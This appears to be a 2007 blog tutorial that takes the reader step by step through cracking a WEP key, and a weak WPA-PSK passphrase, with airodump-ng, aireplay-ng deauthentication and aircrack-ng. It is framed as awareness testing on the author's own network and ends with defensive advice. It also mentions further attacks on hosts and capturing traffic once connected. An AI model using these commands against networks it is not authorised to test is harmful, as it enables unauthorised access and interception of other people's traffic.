Sunday, December 23, 2007

Wireless Network Penetration

The purpose of this blog post is to list the tools used and steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully this blog post will help the reader recognise how trivial it is to bypass WEP encryption or WPA-PSK encryption protected with a weak password.

The steps followed below and the tools used can also be employed to break WPA-PSK encryption that utilizes weak passwords or pass-phrases. I shall point out the changes necessary to break WPA-PSK where appropriate.

The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks.


  • airodump-ng
  • aireplay-ng
  • aircrack-ng
  • Wireless Assistant

The Attack

1. I first run airodump-ng to identify the networks I can see. This also makes sure my card is configured correctly.

airodump-ng wlan0

I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later).

If my card wasn't correctly set up (i.e in promiscous and in monitor mode) I could either run airmon-ng or set it up manually as detailed below:

ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Then I would use ifconfig and iwconfig to make sure the settings were correct.

2. I now run airodump-ng with switches to tell it to only collect the Initialization Vectors (IV's) on channel 3 ad output it to a file using my wireless interface (wlan0)

airodump-ng --ivs -c 3 -w wepdump wlan0

The result of this are 2 files, wepdump-01.txt & webdump-01.ivs. The .ivs file is the one I am interested in.

When capturing data to break WPA-PSK do not use the --ivs switch. The entire packet needs to be captured. Another requirement packets to crack WPA-PSK is to force the client to re-associate with the AP. this can be done using the aireplay-ng tool and the following syntax:

aireplay-ng -0 1 -a {AP BSSID} -c {client BSSID} wlan0

To obtain the AP & client BSSID's i use kismet, however this can be done with aireplay-ng. Check out the switches.

Note: when collecting the IV's having the best signal possible will speed things up.

3.After 15 mins I stop the capture and run the collected IV's through aircrack-ng. I specify the BSSID in this command.

aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs

As you can see it has decrypted the key as C3:C0:8C:90:3D

If i was decrypting WPA-PSK i would need to specify a dictionary file containing the password with the -w switch. My syntax would therefor look like this:

aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap

4. I now reconfigure my wireless card to connect to the wireless network.

Currently the card is in monitor mode so I reconfigure it using the following commands:

ifconfig wlan0 down

ifconfig wlan0 -promisc

iwconfig wlan0 managed

ifconfig wlan0 up

Once reconfigured I quickly check I can see the target network using:

iwlist scan

5. I now use the Wireless Assistant to connect the target network with the key.

6. After Connecting to the target network I check my network & wireless settings and test connectivity to the web.

Now I have an IP on this network I can either use this network connection to access the Internet or to perform further attacks against hosts on the wireless network or I could capture the web traffic and do interesting things with that.


WEP encryption is very broken. Only use as a last resort, and if no other encrytion is available. If you do need to use WEP use additional layers of security to protect your network further such as MAC Address Filtering, Hidden SSID, Fixed IP's or a limited DHCP scope. These additional measures can all be bypassed but they make the attackers job that little bit harder.

Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!


No comments: